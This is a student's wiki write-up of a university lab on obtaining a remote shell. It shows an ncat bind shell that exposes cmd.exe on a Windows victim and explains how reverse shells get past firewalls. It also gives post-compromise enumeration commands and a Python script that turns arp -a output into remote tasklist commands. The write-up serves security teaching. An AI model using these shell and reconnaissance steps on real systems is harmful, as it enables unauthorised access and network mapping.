SEC 110 Week 6 Lab - Caden-Gallup/TechJournal GitHub Wiki

Popping Shells Lab

What we did

In our lab today, we took the roles of two different individuals, attacker and victim, to obtain a shell on a remote system. We used ncat to get a shell on a Windows 10 virtual machine. The lab showed how an attacker obtains a shell and how the attacker decides which port to use on the target. The commands we used set up a bind shell: ncat listens on the victim and the attacker connects in. The scenario the lab described is the other direction, a reverse shell: the victim is tricked into opening a document or some other file that connects back out to the attacker's computer, giving the attacker a shell on the victim's machine. That outbound version is the one that works even when the victim is behind a firewall, because most host firewalls block new inbound connections but let the victim connect out.

Basic Commands Used

  1. ncat -l 8001 -e cmd.exe -v
    Explanation: Run on the target. This starts a listener on TCP port 8001; when someone connects, ncat executes cmd.exe and wires its input and output to the connection (-e). -v is verbose mode and prints what ncat is doing, such as the bind and each accepted connection.

  2. ncat X.X.X.X 8001
    Explanation: Run on the attacker's machine. Connects to the target IP on port 8001; whatever is typed goes to cmd.exe on the target, and its output comes back over the same connection.

Important Terms

  • Nmap - Network Mapper, a port scanner used to find hosts and the ports they have open
  • Shell - A command line interface that allows us to talk to a machine via a command prompt
  • IP address - A unique string of numbers that identifies a device on a network

Useful Commands in the Shell

  • Get the list of local users - net user (net users is accepted as well)

  • Enumerate other hosts that advertise themselves by name on the network - net view

  • Enumerate users on the domain - net user /domain (only works from a domain-joined host that can reach a domain controller)

  • List running processes - tasklist

  • List services and the process each one runs in - tasklist /svc

  • Enumerate internal systems without special tools like Nmap - arp -a (this reads the ARP cache, so it only shows hosts on the same subnet that have recently exchanged traffic with the victim)

  • After getting the IP addresses from arp -a, list processes on a remote host - tasklist /s IP_ADDRESS (runs over RPC with the current user's credentials unless /u and /p are given, so it only works where those credentials are valid)

  • Get installed software versions - wmic product get name, version, installlocation (slow, and querying Win32_Product makes Windows Installer run a consistency check on every MSI package, which can trigger repairs and event log entries; wmic is also deprecated in current Windows releases)

  • Running process details - wmic process

  • OS details - wmic os

  • User account details - wmic useraccount

  • Detailed host information - systeminfo (sysinfo is the Meterpreter equivalent; in a cmd.exe shell the command is systeminfo)
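The arp -a and tasklist /s steps above chain together: the ARP cache gives a list of addresses, and each real host in it is a candidate for the remote tasklist. The Python below is an added example, not the lab's own code, that parses the layout Windows arp -a prints, drops the entries that are not hosts (multicast groups, the subnet and limited broadcast addresses, the victim's own interface), and emits the follow-up tasklist /s command for each survivor. SAMPLE_ARP_OUTPUT is constructed for the demo; its addresses are made up.

```python
"""Turn `arp -a` output into hosts worth pointing `tasklist /s` at.

Added example, not the lab's own code. SAMPLE_ARP_OUTPUT is constructed
in the layout Windows `arp -a` prints; every address in it is made up.
"""
import ipaddress
import re

SAMPLE_ARP_OUTPUT = """\
Interface: 10.0.5.23 --- 0xb
  Internet Address      Physical Address      Type
  10.0.5.1              00-50-56-a1-00-01     dynamic
  10.0.5.40             00-0c-29-3b-12-9e     dynamic
  10.0.5.41             00-0c-29-7f-aa-10     dynamic
  10.0.5.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
IFACE_RE = re.compile(rf"^Interface:\s+({IPV4})\s+---")
ENTRY_RE = re.compile(
    rf"^\s*({IPV4})\s+([0-9a-f]{{2}}(?:-[0-9a-f]{{2}}){{5}})\s+(dynamic|static)\s*$",
    re.IGNORECASE,
)
BROADCAST_MAC = "ff-ff-ff-ff-ff-ff"


def parse_arp(text: str) -> list[dict]:
    """One dict per cache entry, tagged with the local interface it was seen on."""
    entries, iface = [], None
    for line in text.splitlines():
        m = IFACE_RE.match(line)
        if m:
            iface = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"iface": iface, "ip": m.group(1),
                            "mac": m.group(2).lower(), "type": m.group(3).lower()})
    return entries


def is_real_host(entry: dict) -> bool:
    """Drop the noise: multicast groups, subnet and limited broadcast
    addresses, and the victim's own interface address."""
    ip = ipaddress.ip_address(entry["ip"])
    if ip.is_multicast or entry["mac"] == BROADCAST_MAC:
        return False
    if ip == ipaddress.ip_address("255.255.255.255") or entry["ip"] == entry["iface"]:
        return False
    return True


def candidate_hosts(text: str) -> list[str]:
    return [e["ip"] for e in parse_arp(text) if is_real_host(e)]


def followup_commands(hosts: list[str]) -> list[str]:
    """Next lab step per host. tasklist /s runs over RPC with the current
    user's credentials unless /u and /p are supplied."""
    return [f"tasklist /s {h} /svc" for h in hosts]


if __name__ == "__main__":
    print("\n".join(followup_commands(candidate_hosts(SAMPLE_ARP_OUTPUT))))
```

Since the ARP cache only holds hosts this machine has talked to recently, treat the list as a sample of the subnet rather than a map of it; hosts that have been quiet, or that sit on another subnet behind the gateway at 10.0.5.1, will not appear.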

Resources Used